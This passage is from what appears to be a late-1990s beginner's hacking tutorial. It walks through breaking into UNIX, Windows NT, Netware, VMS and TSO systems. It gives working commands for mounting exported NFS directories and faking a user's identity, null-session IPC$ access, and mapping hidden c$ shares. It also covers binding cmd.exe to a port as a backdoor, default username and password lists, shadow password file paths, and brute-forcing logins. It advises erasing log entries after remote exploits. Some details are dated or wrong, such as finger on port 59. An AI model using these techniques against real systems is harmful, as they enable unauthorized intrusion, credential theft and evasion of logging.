NIS is used to provide information about these apps. Portmapper is what RPCs use to
get this information from NIS, so if you that port listening, use the command rpcinfo to
query that port and get valuable information from it. Type man rpcinfo for more
information on portmapper, RPC, and NIS.
NFS. Network File System - the protocol used to connect UNIX machines. Having to
telnet between UNIX boxes in a network can be a pain in the ass at times. NFS (which
listens on port 2049) is a way to mount remote filesystems to the local machine. Lets say
you work primarily on the machine UNIX1. Occasionally, though, you need to access
files on UNIX2, but don't want to login to it all the time. So the sysadmin mounts part of
UNIX2's filesystem to your own. The directory /acct/dir1/ is mounted to your /mnt/u2
directory. So if you issue a 'cd /mnt/u2' you're actually on UNIX2 - but can't go any
further up the hierarchy of it that /acct/dir1. The way this works is certain directories are
exported, meaning made available to mounting. To look for exported directories on a
remote UNIX server, type this command:
showmount -e www.victim.com
If there are any exports, you'll see something like:
export list for www.victim.com:
/exprt
(everyone)
/var
(everyone)
/exprt/agregor agregor
As you can see, /exprt and /var are exported out to anyone. To mount either, type:
mount www.victim.com /var /mnt/dir
where /dir is where you want to mount /var to on your own machine. If you cd to
/mnt/var, you're now on your target. Here's a more complex break-in. Lets say when you
mount /exprt, you can't get into /agregor from there (access denied) because only the user
agregor and root is allowed access. Lets say you (from your own UNIX box - Linux or
something) fingered agregor@www.victim.com and got:
agregor

/exprt/agregor Tue, Jan 1, 2000

Here we see that his home directory is /exprt/agregor. So we mount that directory (but
still can't get in). We aren't allowed access... but agregor is! And technically, since we
mounted that directory, its considered part of your local machine. You can use the

adduser or useradd command to add a user on your own machine called agregor and pow! - you're in. One last note on NFS - only root can use showmount and mount, so you
really should make a Linux partition on your hard drive. Redhat 5.2 and SuSE (the latest
version) only cost about $30.
The R Services. UNIX utilities like rwho, rlogin, and rwho are used to run these
commands or login to other machines - without using a password. The syntax for these
commands include a username (but default to the user youre logged in as locally), and if
that user on the target machine has an appropriate .rhosts file in his home directory, the
command will execute.
To learn the most about UNIX, you must play around with it. Get a shell account from
hobbiton.org, shellyeah.org, or m-net.arbornet.org. These accounts are pretty limited
(some wont let you use compilers, some wont let you use FTP, etc). For best results,
install Redhat Linux on your system. Appendix G will help you with that.
Windows NT
Until recently, UNIX machines make up the vast majority of machines on the Internet.
Windows NT (New Technologies) has eaten up some of that percentile. Now, somewhere
between 10% and 20% of machines you'll find on the Net are NT boxes. NT machines
ship and are compatible with almost as many services as UNIX, with a few differences.
Generally, you won't find as many open ports on a Windows box because they don't use
raw sockets like the various flavors of UNIX (a socket is a two-way connection between
two computers, using any protocol). NT Server ships with IIS - a HTTP and FTP service.
Finger servers can also be purchased for NT machines. SMTP and POP3 servers come
with Microsoft Exchange Server, which is pretty commonplace. One port that will give
your target away as a Windows box is an open port 139. This is the port for NBT, or
'nbsession' according to some portscanners. UNIX machines use strictly TCP/P for
communications (making them ideal machines for the Internet), whereas NT uses Net
BIOS (Net BIOS does not work over the Internet, so NT Servers must utilize Net BIOS
over TCP/IP in order to do so), or what they call NetBEUI (Net BIOS Extended User
Interface - which also uses Server Message Block, or SMB). To connect to an NT
machine, you must use Microsoft Client. Using MS Client to connect to a Net BIOS
ports on a Windows machine is similar in nature to telnetting to port 23 on a UNIX
machine. If you have Windows 95 / 98 / NT, you have Microsoft Client. It might not
have it installed though. To check, go to Control Panel, then Network. You should then
see a list of protocols you have installed on your machine. In order to use MS Client, you
need NetBEUI, Client for Microsoft Networks, and (of course) TCP/IP. If you are
missing any of these, click on 'Add' and add the appropriate client or protocol (you'll
probably need Windows disks). Also, some NetBEUI stuff only works if you have the
latest version of Dial-Up Networking. Go to microsoft.com for the update. To use MS
Client, open a DOS box. The command you will be using is 'net.'
Type 'net' to see a list of Net commands. Some of these cannot be issued from a DOS
windows. The two you as a hacker should be concerned with are 'net view' and 'net use'.
If ever you come across a machine with an open port 139, there is a chance that the
machine has open shares on it. A Windows share is a directory somewhere on the server
(be it Windows 95, 98, or NT) that is set up to be accessed by others in the network.
Sometimes they are password protected, sometimes not. Once connected to a share, you

can use regular DOS commands (cd, mkdir, edit, etc.) to move about and manipulate files
within it.
Shares come in two varieties: share level and user level. Share level (usually only found
on Win9X peer-to-peer networks) shares are protected only by a single password. Anyone
knowing that password can access that folder. User level shares are more UNIX-ish, in
that your access to them depends on who you are logged in as. Unfortunately, you can
only log into an NT machine if you have NT yourself (either NT Workstation or NT
Server). When NT admins setup user level (NTFS) shares, they determine what users and
groups (similar to UNIX groups) can access them. To look for shares on an NT box, at a
DOS prompt type:
net view \\ip_address
If you get a message back saying that you need to log in before using net commands, you
either don't have the latest DUN, or you aren't logging into your own machine (at the
Windows Login screen). If the machine has shares (and most NT servers do), you'll see
something like:
Share
------mktg
lpt1
acct

Description
---------------Marketing folder
Printer 1
Accounting folder

Here there are two shared folders, and a shared printer. If you have Windows 95 or 98,
you'll only be able to connect to these shares if they're share level (not user level). To do
so, type:
net use x: \\ip_address\sharename
Where x is the drive letter you want to map the share to. So if you wanted to connect to
map the mktg folder to your i: drive, you'd type:
net use i: \\123.54.87.9\mktg
If you get the message 'The command completed successfully,' your drive i: is now the
mktg folder on your target machine. If you're prompted for a password, the share is either
share level and password protected, or user level and you won't be able to map to it. You
also may just plain be denied access. Once you decide to get an NT partition on your hard
drive, you'll be able to log in. So, if you knew that the Administrator (superuser equivalent to root on a UNIX system) password was 'letmein', you'd type:
net use i: \\123.54.87.9\acct letmein /user:Administrator
to map i: to the user level share acct from your NT machine. You can also map a drive
GUI, by right-clicking on My Computer, and then on 'Map Network Drive.' Another way
to connect to NT machines is with the nbtstat command. To get very useful info on a
particular NT box, at a command prompt, type:

nbtstat -A ip_address
If the machine is NT and has port 135 or 139 open, you'll see a table full of valuable info.
It might look something like:
Net BIOS Remote Machine Name Table
Name
Type Status
--------------------------------------------------------srv3 <00>
Unique Registered
r7labs <00>
Group Registered
srv3 <20>
Unique Registered
srv3 <03>
Unique Registered
ghost <03>
Unique Registered
The hex code in anglebrackets ( <these things> ) tells us what each entry in the table
means. A code of 00 means NetBEUI name. The first entry, srv3 <00> tells us that this is
a name, and the Unique tells us that its the name of that computer. You now have the
NetBEUI (Windows name) name of that box. The second entry, r7labs <00> is also a
name, and the Group tells us that this is the domain name. This is the Windows domain
name - not necessarily the Internet domain name. The srv2 <20> code means that this
machine has file sharing enabled - which means you'll probably find shares with a 'net
view.' Appendix C of this text has explanations for each hex code you'll find with an
nbtstat.
Another way to connect to an NT machine is to add it to your lmhosts file (in your
windows directory). Open a file called lmhosts (with no extension), and edit like so:
ip_address netbeui_name #pre
where ip_address is the IP address of your target, and netbeui_name is the name you got
from the nbtstat. For an example, look at your lmhosts.sam file (but don't use this file,
only use lmhosts with no file extension). Next you want to load the file into your
NetBEUI memory cache, with this command:
nbtstat -R
Now, go to your Start button, then Find, then computer, and type in the NetBEUI name of
the computer. An icon representing that computer will appear - right click on it and then
click 'explore' to connect to the machine. This is the GUI way to connect to NT machines.
Again, if you're not using NT, you won't be able to log in.
Once connected, you'll want to see what kind of permissions you have. Create and erase a
file. Make and delete a directory. You could have only read permissions, or you may have
read and write (read files and modify them). Standard DOS commands work, and any
mapped network drives will also appear in Windows Explorer as if it were on your local
machine (similar to UNIX NFS).
One thing that puts NT apart from UNIX is its Client/Server-ness. If you telnet to a
UNIX box and run a program, it will be run on that machine, using its CPU and RAM. If

you map a network drive to an NT server and run a command, it will be launched and ran
on your computer, using your resources. So if you upload an exploit, map a drive, and
double-click on the sploit with Explorer, the exploit will run on your computer. It is
possible to get programs to run on that machine instead of your own, which will be
explained in the 'Unbelievable...A Hacker!' section.
Hacking NT
Most of the time shares will be user level, or at least password protected user-level. And if
you aren't logged in, net view's will report no open shares (why would the system tell you
what folders are shared to someone who hasn't logged in?). So you have a few options.
You could get the password hashes and crack them with L0phtCrack (explained later).
Or, you could use Brute Force: write a batch file that connects to the share, then spits
passwords from a wordlist (available all over). If you aren't skilled at writing batch files,
get yourself a good DOS book, and at least find out about commands and DOS
environment variables. You could make yourself quite a powerful brute force sharecracker batch file in under 20 lines. I personally use VB for brute force engine making.
Also, if you want to quickly search an entire (or even multiple) subnet(s) for open shares,
use a share scanner such as Legion. But most likely you wont be able to see (let alone
map to) anything at first. So here are some steps to take in breaking into an NT server.
Follow steps one, two, and three in the 'Getting Started - You're First Night as a Newbie'
section. Once done, you should have a handful of usernames, as well as know what ports
are open on what machines, and what services are running on those ports. If port 21 is
open, its probably IIS. If you can get in anonymously (username 'ftp' with any password),
try using this command:
cd /c
Once in a while a misconfiguration will bring you to the systems actual root directory
(where as with normal anonymous access you can't go very high in the hierarchical
filesystem). This usually doesn't work, but is worth a shot. Use one of the fingerprinting
methods explained earlier to determine the webserver (if port 80 is open). Both IIS and
FrontPage are plagued with vulnerabilities. How to exploit these is explained in the
'System Exploits' section.
Any share that's name ends in a dollar sign is hidden, and won't show up in a net view or if
you use the GUI approach to viewing shares. To connect to them, you only need to refer
to them by name. Common hidden shares are:
c$
The entire C: drive
d$
The entire D: drive (if its another hard disk or partition)
admin$The \%systemroot% (\winnt) directory
ipc$ Inter-Process Communications - not really a share (explained shortly)
By default, all drives are shared but hidden, as is the winnt directory. So map your drive e:
to your target's c: drive, you'd simply type:
net use e: \\38.57.128.2\c$ password /user:username
Or you could do it the GUI way (with nbtstat or Map Network Drive).

Another way to hack in would be to put a Trojan on the server. Netcat is a program you
can use to bind programs to ports. One way to allow yourself a back door to a system is
to bind cmd.exe (similar to Win9X's command.com) to a port. NCX and NCX99
(available at technotronic.com) do this for you. Once you bind cmd.exe to port 80 or 99,
you can telnet in and get a DOS prompt (how very UNIX like!)
Your ultimate goal is probably to get the password file. Unfortunately, NT stores the
password hashes in the registry. Sometimes you'll find a backup copy in
\winnt\system32\repair\sam._, but if not you'll have to resort to other methods of getting
them. Once you do, you'll use L0pht Crack to crack them.
A few programs will also aid you in hacking into NT networks. Ogre is a very useful NT
scanning utility. It will scan ports, net view, and nbtstat every machine in an NT network.
NAT is also a powerful Brute Force engine, and can log into NT networks even from an
Win9X machine (though to log in yourself, you'll still need NT). For more advanced NT
vulnerability exploits, read the 'System Exploits' section. For more NT commands that
you'll need, type 'net' at a command prompt. For more info on each net command, type:
net command /?
NAT is a great tool for BF-ing NT machines too. Take your list of valid usernames and
put them into a file for NAT to use, and user a small password file (the one that comes
with NAT is good - add a few password guesses of your own too). Also, the latest version
of Legion (2.1) will not only scan for shares, but will attempt to brute force any it finds, if
the user so desire. Both programs are made by the Rhino9 team, NT hacking experts.
Here's a newer vulnerability in NT. Remember the hidden ipc$ share? As I said before, its
not really a share, per say: its not a shared folder. Its a channel used by NT Domain
Controllers (PDC's and BDC's) to exchange network information two each other. And a
hacker could theoretically use this 'channel' to break in. Remember how groups work in
NT. Like UNIX, certain files and folders are accessible only two certain users or groups.
One built-in group of NT is called 'Everyone', which encompasses anyone logged into the
domain. It's possible for someone to connect to the IPC share, and masquerade as an NT
Domain Controller, and by doing so, becoming a member of the 'Everyone' group.
Without even logging in. Consider the following.
C:\hacker_toolz>net view \\202.53.198.1
System error 5 has occurred
Access Denied
NT Server 202.53.198.1 just told us to go to hell since we haven't logged in. Heh - watch
this:
C:\hacker_toolz>net use \\202.53.198.1\ipc$ "" /user:""
We just connected to the IPC share with a username of null (meaning none: /user:""), and
a password of null (""). Also, notice that we didn't specify a drive letter to map IPC to,
since its not a standard share. What we've done is connect to 202.53.198.1's IPC share in
the exact same way another Domain Controller wishing to exchange data would. And that
makes us part of 'Everyone.' It thinks we're another server in its domain. Now watch:

C:\hacker_toolz>net view \\202.53.198.1

Shared resources at 202.53.198.1:
Share
Description
---------------------------------------folder1
Mngr's Folder
usenet
NNTP
printer
Printer
Now that we're part of 'Everyone', the server just spilt its guts to us, when seconds ago it
wouldn't. This only works if the server you're net view-ing is configured to allow the
Everyone group to browse it. Can we map network drives to these shares and explore?
There's a good chance of that. You can also use the user2sid and sid2user tools (available
at www.hackingexposed.com) to glean usernames (which makes brute force much easier).
This is a well known vulnerability that is easily solved, but you'll find this tactic works on
lots of NT Servers.
One last note on NT hacking. The WINS (Windows Internet Naming Service) protocol is
responsible for translating NetBEUI names (Net BIOS uses computer names instead of
addresses) to IP addresses. To look at the WINS configuration of any computer, use the
nbtstat command. Furthermore, the file lmhosts on any windows machine will act as a
mini WINS table if WINS itself is disabled (TCP/IP properties under Control Panel >
Network).
Novell Netware
UNIX machines still claim most machines on the Net. NT is catching up, and between the
POSIX and Win32 platforms, you wont find much else on the Internet. Once in a great
while, however, you just might run into a completely different operating system. Novell
Netware used to be the biggest Client/Server Network Operating System around, and
rivals NT to this day. So just in case you run into one of these foreign systems, here is a
little info on Novell Netware.
NTs core protocol (integrated with Net BIOS) is SMB. Netware, on the other hand, uses
NCP (Netware Core Protocol) as its main protocol for serving files. Netware has been
around for quite some time - the first version was command-line and sat on top of DOS.
Now GUI clients exist for it, and version 5.X has been released. Like Windows NT,
computing is not centralized (like UNIX), and resources are distributed among the
network. One computer may be a print server, on might be a mail server, another a file
server. The thing that makes Netware unique is what's called the NDS database, or Novell
Directory Services. The NDS is a little comparable to an NT network's PDC's registry. It
is a hierarchical representation of the entire network. Everything on the network (users,
servers, printers, logon scripts, etc.) is represented by an appropriate object in the NDS
database. At the root of the NDS tree is the object 'root,' similarly to a root directory.
Stemming from the root object, are one or more 'organizational' objects, comparable to
subdirectories. Inside these objects can be more organizational objects, or what are
known as 'leaf' objects, comparable to files. These leaf objects are what make up the
conceptual network. Leaves include user objects, representing users of the network,
server objects, representing servers, and so on. The organizational units exist for no other

reason to conceptually organize the network. The whole idea of an NDS is sometimes
hard to grasp at first, due to its being so abstract, but greatly eases administration.
When you refer to a specific file on a hard disk, you refer to its path. When you refer to
an NDS object's location, you refer to its context. Paths start with root at the left, such as:
C:\Winnt\programs\file.ini
Contexts, on the other, hand, start with the root at the right, such as:
.user22.market.UAS
where user22 is the object we are referring to. We don't need to specify root because its
assumed that root is always after the last organizational unit listed. The context above
specifies the user22 object, which is in the organizational unit 'market,' which resides in the
organization 'UAS.' When referring to objects absolutely (full context), you must start the
context with a periods (.), and separate each entry with a period also. Now if your current
working context was .market.UAS (same concept as a current working directory), you
could refer to user22 relatively (just as in UNIX or DOS filesystems) with simply:
user22
with no period.
Now, Netware networks are usually GUI interfaces. If you ever connect to a Novell
server over the Net, you will have to navigate it commandline, though, unless you want to
download GUI clients from www.novell.com. Mapping network drives to Netware
volumes (similar to a Windows share) as you would to an NT machine, with the MAP
command. You would change your context and navigate the NDS with the CX command.
In order to do this, you will need to get your hands on a Netware client. You can get a
free command-line client at www.novell.com. Client32 is a good one.
Now each user in a Novell network is represented by a user leaf object on the NDS tree.
So to log in as user22 who's object is in the marketing.UAS container, you have to log in
as:
.user22.marketing.UAS
Mapping drives to Netware volumes (a volume is just like an NT share) is done in one of
two ways. You can either specify the server name you are connecting to physically, such
as:
map x: servername/volumename
or by its NDS object, such as:
map x: server_nds_object:volumename
When trying to break into a Novell server on the net, with say, an IP address of
212.14.6.2, you would issue this command (with a Novell client in a DOS box):

map x: 212.14.6.2/datafiles
where datafiles is the volume you want to connect to. It is beyond the scope of this text
to get into great detail about all the commands and innerworkings of Netware, so feel free
to jump into a Netware book. Really.
Hacking Netware
Breaking into Netware servers is just like hacking into anything else: you need to know as
much as you can about the OS. Plenty of exploits exist for Netware - www.hackers.com
has a lot. So, if you want to crack a Novell system, complete steps one, two, and three of
the 'Getting Started - Your First Night as a Newbie' section. Try to Brute Force the
usernames you find. Also, there are a few public volumes attached to each Netware server
by default.
Logon This is accessible to everyone - logged on or not.
Public This is accessible to anyone logged on, no matter who.
Sys
This is the system volume - phun to explore.
Here are some commonly used login names and passwords for Netware:
Username
Admin
Backup
Guest
Netware
Novell
Public
Remote
Server
Staff
Supervisor
System1
Tape
Test
User
Visitor

Password
operator, supervisor, sysadm
visitor, user
NetWare

admin, operator, sysadm, supervis, manager

backup
testuser
guest

Also, brute force programs and password crackers exist for Netware by the truckload, as
well as exploits and other handy Novell hacking utilities. If you're serious about hacking a
Novell system, familiarize yourself with them.
Miscellaneous OS's
Most of the systems youll find will be some sort of UNIX. A lot will also be NT. And a
few might be Netware. And thats about all youll find while exploring the Internet. But if
you find yourself trying to break into a machine via its dialup modem, you might be
connecting to an older mainframe. Twice in my life, though, I have telnetted to a machine
to find the unfamiliar logon screen of a mainframe as well. Also, you might (which, by the

way, happened to me) target a network for some reason - to find out that its a network of
Macs (ugh)! Im not going to spend much time on OSs other than NT and UNIX, but
heres a little info on some others you might run into. For more info, hit a search engine
or get a book.
MacOS
I hate Macs. Any OS without a command-line isnt worth my time, and in my humble
opinion, should be forced upon AOL users. Hackers generally like the OSs that they hack
into - which is why they stay up until four in the morning trying to break in. But you
might have a more specific motive to breach the security of a particular network, and if its
a Mac network, youll have to learn a little bit about it. Just dont admit to it.
Macs connect using the proprietary protocol Appletalk. Surprisingly, this protocol is
routable. Each subnet (a term that will confuse most any Mac user) is called a Zone.
Appletalk can be run over IP, for the purpose of talking TCP/IP networks. If the
Appletalk network in question is connected to the Net, at least the proxy server has to
have this dual protocol capability. If you ever find a Mac machine on the Net with a valid
IP address, it is running Appletalk over TCP/IP.
The protocol used to share resources is called AppleShare. AppleShare is (at its
application level) similar to NetBEUI. Folders are flagged as shared, and thereby made
available to the rest of the network. Some are password protected, and require a
username and password. Mac sysadmins tend not to be to security-savvy, though, and
Guest access is usually possible. To access these folders, your computer will need to
speak Appletalk, and youll need a client to connect to AppleShare servers. TSSTalk
(available at www.thursby.com) is a free program that will configure both requirements for
you. All you have to do with it is enter the IP address of the Mac, and it will show up on
your Network Neighborhood. Double-click the computer icon and youre off to hacking.
VMS
VMS (Virtual Memory System) was a popular mainframe OS a few years back. It runs on
VAX machines, and rivaled UNIX in it popularity for hackers to try to crack. Finding a
VAX on the Net is an extremely rare find, but finding one on the end of a dialup link isnt
so. One thing that is stereotypical about VMS is its potential for security. If the VAX
sysadmin knows what hes doing (at rarely do complete idiots run OSs as complex as
VMS), the system can be very secure, including extensive logging, encryption schemes,
restrictive privilege rules, and even hacker traps.
Many VAX machines are interconnected via MultiNet, making the VAX network a bit
more client/server. The prompt of a VMS system looks something like:
$DISK3:[user21]
Where DISK3 means youre currently on the third disk (most VAXs have multiple disks,
just like you can have a C: hard disk and a D: hard disk) and you are in the directory
user21, which is probably a home directory. Once at a prompt, you can issue a variety of
commands. Telnet and ftp both work, and function like their counterparts in the UNIX
world. You can use dir or directory to get a listing of your present working directory.
If you do, you might see something like:
Text4 [users, user21]

App2 [users, admin]

Where text4 is the name of the file, and the brackets represent permissions. User21 owns
the file text4, and is in the Users group. With the command cdup you can jump to the
root directory of your disk, at which point your prompt would look like:
$DISK3:[000000]
And if you wanted to view a file, youd use the type command, just like in DOS. Rm
deletes files, like in UNIX. Rmdir removes an entire directory, and mkdir creates them.
You must have the appropriate permissions in your PWD to do this, of course. If ever you
try to read, copy, move, run, or delete a file, you might get a message like:
<%RMS-E-PRV, insufficient privilege or file protection violation
Meaning you dont have the privileges to access the file in question.
VAX machines on the Net will have very few ports open, so your hacking options will be
limited. And if you dial into the mainframe, thats (obviously) your only point-of-entry.
Brute force is the only for-sure way to get that initial account and further hack a VAX.
Here is a list of commonly used usernames and passwords for VMS:
Username
SYSTEM
OPERATOR
SYSTEST
SYSMAINT
FIELD
GUEST
DEMO
TEST
DECNET

Password
OPERATOR, MANAGER, SYSTEM, SYSLIB
OPERATOR
UETP, SYSTEST, TEST
SYSMAINT, SERVICE, DIGITAL
FIELD, SERVICE
GUEST, (unpassworded)
DEMO, (unpassworded)
TEST
DECNET

TSO
I include IBMs TSO only because Ive seen a couple on the Net, and dialed into a few.
Youll know a TSO machine by either its login prompt:
IKJ56700A ENTER USERID:
Or by the way it responds to a bad login:
IKJ56943I USERID (whateveryoutyped) NOT AUTHORIZED TO USE TSO
And if you do login, youll either be presented with a menu system or a command prompt.
Old colleges sometimes connect TSO machines to their network to hold legacy databases,
such as books and the like. If youre presented with a menu system, issue a variety of
obscure (and long) commands to break out into a prompt. If you enter an invalid
command, youll usually get an error message that says something about an unrecognized
transaction. Here are a list of commonly used TSO login names and passwords.

Username
Admin
Guest
Init
Maint
Systest
Test1
Tso

Password
adm

test
test

There are many more mainframe operating systems out there. Most of them, though,
youll never see, especially on the Net, since computing has become more decentralized
and client/server over the years. Many hackers wont even bother with these dinosaurs. If
you ever run into one, though, and want to explore, get yourself an older hacking text,
like The Neophytes Guide to Hacking (where I got some of the stuph above), or
something similar. Hackers.com has a few older texts like this. Ill personally stick to
UNIX and NT.
"Unbelievable - a Hacker!
The object of your hack will most likely be to obtain root, ie: total control over the
network. With a rootshell (any shell with root privileges, such as the superuser account)
you can read, write, and execute everything on the network (or at least that particular
computer). To obtain root, you'll probably have to break in with some other account first.
From there you can run a local exploit, download the password file, or whatever. If its an
NT machine that your hacking, you probably want either the Administrator's account, or at
least have a Trojan or RAT installed on it to give you total control. In this section I'll go
into the various means of getting root (or equivalent).
Brute Force
Brute Force is the simplest hacking technique, yet oftentimes provides results. When all
else fails, you might be left with no other option than a brute force attack. This means
hurling usernames and passwords at system until it cracks. Use the list of commonly used
UNIX combination supplemented with this text. Spend time trying to crack individual
email addresses. Honestly, you havent made a full-hearted brute force attempt until
you've spent at least two or three hours doing nothing but trying different combinations.
Since UNIX login prompts wont tell you if you've used a valid login name or not, narrow
it down! Here is a quick list on how to obtain usernames:

If port 59 (finger) is open, you will be able to obtain lots of usernames. Telnet in!
Telnet to port 25 (SMTP) and use the VRFY command to verify the existence of
usernames. Type HELP for more commands.
Any email addresses on the network's webiste will be valid usernames.
Look at the /etc/passwd file of any UNIX machine (including one of your own).
There are tons of default usernames that get used all the time.

NT: using a null IPC session and the SID tools (explained in the Elite Hacker
Tactics section) youll be able to get every username for a PC or domain.

When you first target a system, before going into finding exploits and the like, spend a few
minutes BF-ing some common accounts. Wouldn't you be pissed if you spend hours
compiling an exploit to find that the root password was simply 'root'?
Also, you could write a program (or shell script if you have a UNIX box yourself) to spit
usernames and passwords from a dictionary wordlist fill at the system (available all around
the Net, usually in supplement to password crackers).
If you want to become eleet eventually, you'll need to learn at least a little about at least a
few programming languages. The easiest (yet still effective) language to learn, especially
for newbies, is Visual Basic. I once wrote a VB prog that used NetCat, and repeatedly
telnetted to my target and spat usernames (from a list that I compiled that I knew to be
valid usernames) and passwords (from a huge dictionary file), and redirected all output to
my screen and a log file. I'm no programming expert, but with an hour of coding and
another of debugging, all I had to do was sit back and watch as my little proggie
automated a brute force attack with decent speed. Already made BF progs exist too.
Unsecure is a decent one for FTP and Telnet login prompts. NAT is great for NT. Just
remember - brute force will always work, eventually.
Local Xploits
A local sploit (exploit) is a program that exploits some security bug inherent in the
operating system, and will greatly increase your access levels, oftentimes to root. A local
exploit (as the name implies) is something you'll have to run on the system you're hacking.
If its UNIX, you can telnet in and run it. If its NT, you'll have to use one of the following
methods to run the exploit (remember that running a program on a remote NT machine
from a mapped network drive will launch it onto your computer).
Run it with a Trojan such as Netbus or Back Orifice.
Put the exploit in the cgi-bin directory if its a webserver, and request it with your
browser.
Use the scheduling (AT) command to run it - Admins only.
Use NCX or NCX99 to telnet in and run it.
Put it in a batch file and have some other user run it.
There are many exploits out there, for many different NOS's, daemons, programs, and
modules. One of the most common of these is the Buffer Overflow (also known as a
Stack Overflow). This is a technique which when ran, the OS's buffer (a container of
memory set aside by the OS for data it's working with) if filled with garbage. When the
buffer is "filled," the last string on the stack can be executed, to do such things as initiate a
root shell. To use any local exploit, of course, you need to have an account that you can
log into FTP with and upload the exploit from your computer to the server you want to
run it on. Or if you only have telnet access, you can use vi (or some other text editor) and
rewrite the exploit. Use cc or gcc to compile it if its not already (most UNIX exploits are
not compiled, nor are most NT exploits). You then need to log in via telnet and run it, or
launch it on the remote NT machine as explained above. Exploits are OS and version
specific, and it's sometimes hard to find one for a specific one (they are usually available all
over the Internet). See the 'System Exploits' section for a list of more common
vulnerabilities.
If you're on a UNIX system with a non-root account, you have access to hundreds of
programs. Chances are, at least one of these are vulnerable. Look up exploits for that

flavor of UNIX, and you'll most likely find at least one. To find out if a certain program
exists on that machine, type one of these at a command prompt:
which program-name
whereis program-name
You'll be told where the program resides, if it exists. To find a program or file on an NT
machine that you have a drive mapped to, type:
dir /s file-name
while on the network drive.
If you can't find a vulnerability, you'll might want to try your hand at cracking the
password file.
The Password File
Some hackers try to get this file before even using exploits, though getting it may involve
using them anyways. In the /etc directory (UNIX) is a file called passwd, which holds
every password for every user, along with some other information. Unfortunately for you,
the passwords are encrypted. This means you'll have to download the password file and
crack it on your own computer. You'll use a password cracker such as John the Ripper for
this. Another security feature system administrators will use to keep hackers out is
password shadowing. If shadowing is done (and oftentimes is), all the encrypted
passwords will be replaced with *'s or x's. These are not crackable. The real password
hashes (encrypted passwords) are most likely on a different file. Here is a short list of
where to find the real password file if /etc/passwd is shadowed.
UNIX Version
Path
-------------------------------------------------------------------AIX 3
/etc/security/passwd
BSD 4.3
/etc/master.passwd
ConvexOS 10
/etc/shadpw
ConvexOS 11
/etc/shadow
Digital UNIX
/etc/tcb/aa/user/
HP-UX
/.secure/etc/passwd
IRIX 5
/etc/shadow
Linux
/etc/shadow
SunOS 5
/etc/shadow
System V r4.0
/etc/shadow
UNICOS
/etc/udb
Though the unshadowed file could potentially be everywhere. Use the grep command and
look for files with the word 'root' to find potential candidates. You may not always have
read access to the real file - you may have to do some stair stepping, or use a local exploit.
To give you an idea of what to look for, here is an encrypted password file:
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh

admin:rYsKMjnvRppro:100:11:WWW
administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
Here is a shadowed password file:
root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh
At any rate, when you crack these, depending on the encryption strength and passwords
used, you should get a handful of valid usernames and passwords. If you didn't get the
root password, you could also use one that belongs to the same group as root (such as
admin or sysop). One note about root: a lot of systems are set up so that root cannot log
in remotely (from outside). This means you'll have to log in as someone else, then use the
'su' command and enter the root password (su is used for system administrators to jump
around from account to account, and stands for 'substitute user.')
NT passwords are a little different. They are kept in the registry, not just a file like UNIX,
which makes them harder to get your hands on. They are encrypted as well. There are a
few ways to get them.
Do a core dump (RAM dump) since the registry is in memory. This is not easy
for beginners, and surgically removing the hashes from memory required
debugging knowledge.
Do a remote registry dump (with L0pht Crack). If the NT machine allows for
remote registry sharing and you have NT at home, you can extract the password
from your target's registry over the Net.
Get the sam._ file. If the Admin backs up the registry using rdisk.exe, the
password hashes may be stored in \winnt\system32\repair or somewhere similar.
Remote registry dumps and importing the SAM hive (sam._) into L0pht Crack requires
NT. Windows NT registry's are made up of Hives. Each hive is stored in a *._ file. The
hive with the passwords in it is SAM._. So why don't you just download it like a UNIX
password file? Because NT is set up not to let anyone see, copy, or modify the SAM hive.
Your only hope besides the methods listed above is to boot your target machine into an
alternative OS, like Linux or DOS, then get the file (NT protects the file, DOS and Linux
doesn't). This is difficult over the net. It is, however possible. Also, you'll need a
program that will allow DOS (which uses the FAT filesystem) or Linux (which uses the
EXT2 filesystem) access the partition that SAM._ is on (which is in an NTFS filesystem
partition). Once in a while, though, you may come across copies of the hives (all with ._
extensions) stored in a directory like 'repair' or 'reg_backup'. With all the work that it
takes to get NT passwords, you're usually better off trying some other method of getting
in, like exploits.
Infiltration
Again, every open port (port that you found during your portscan) is a door to the insides
of that computer. To find out how each port is a potential point of infiltration for you,

you'll need to find out a little more about each protocol. Do some research. For now, I've
provided a little info on how you can use these protocols against the computer.
Again, when you log in via a telnet port, it as if you are directly connected to and part of
that network. One of the first things you should try is the "front door." Telnet to the
machine, and try some commonly used username and password combinations. Next, try
each of the email addressed you've collected. About one in twenty people are dumb
enough to use their first name or login name as their password (assuming they are allowed
to set their own password), so try that too. Chances are this won't work (though its a
good idea to try anyways), so you can move on to hacking in through various ports.
Oftentimes the FTP service allows for anonymous logins (logging in with 'ftp' as a
username and no password). When you do so, your home directory will be something like
/usr/daemon/ftp or /home/ftp. However, if you issue a pwd (to find what directory you're
currently in), it will say that your pwd is / (root). This means that you are in a restricted
shell. So if after logging in anonymously you cd (change directory) to lib, you will be told
that you are in /lib, while you'll really be in /home/ftp/lib, or whatever. System admins like
to put /bin's and /etc's in the ftp directory, and in the /etc will be a password file - but don't
get your hopes up - 99% of the time its shadowed. Anonymous ftp access is really only
helpful if you can download useful information.
If you see an open finger port, this could be the break you were looking for. Use a finger
client and do a generic query (no usernames) to possibly get a list of users logged on.
Next try putting an @ symbol in front of the domain you are querying, for a list of all
users, logged on or not. For specific user information, type in username@domain.
The rlogin port may be another point of infiltration. This is kind of like telnet, though
older and not as secure. Telnet to it and see what you can do.
The Gopher protocol was used as a text transfer protocol before the days of HTML, the
WWW, and graphics on the web. If you come across a gopher port, use a browser with a
built in gopher client (newer versions of Navigator and MIE) and connect to it. You'd be
amazed as to what the gopher service will sometimes let you see.
Write down any other ports you see. Telnet to them all, and see what happens. If after
you telnet in nothing happens, issue commands, hit enter a few times. Play around - as I
said before, 80% of what you will know will come from experience, not texts.
Remote Xploits
Again, a local exploit is something you run on your victim once you're already in. A
remote exploit is something you run from your own computer that exploits a vulnerability
on one of your target's daemons. Commonly vulnerable daemons are FTP, SMTP, and
HTTP. Oftentimes launching these will be logged on your target - so be sure to clean up
the log files and erase any entries involving you.
Again, to exploit a daemon, find out what program it is, and what version. Search the
exploit archives for an exploit for that, and if one exists, compile and run it. If the FTP
port has the service wu-ftp ver 2.2.4, go out and find the exploit for that exact service of
that exact version. If the SMTP port is running sendmail 8.8.8, get the sploit for it. These
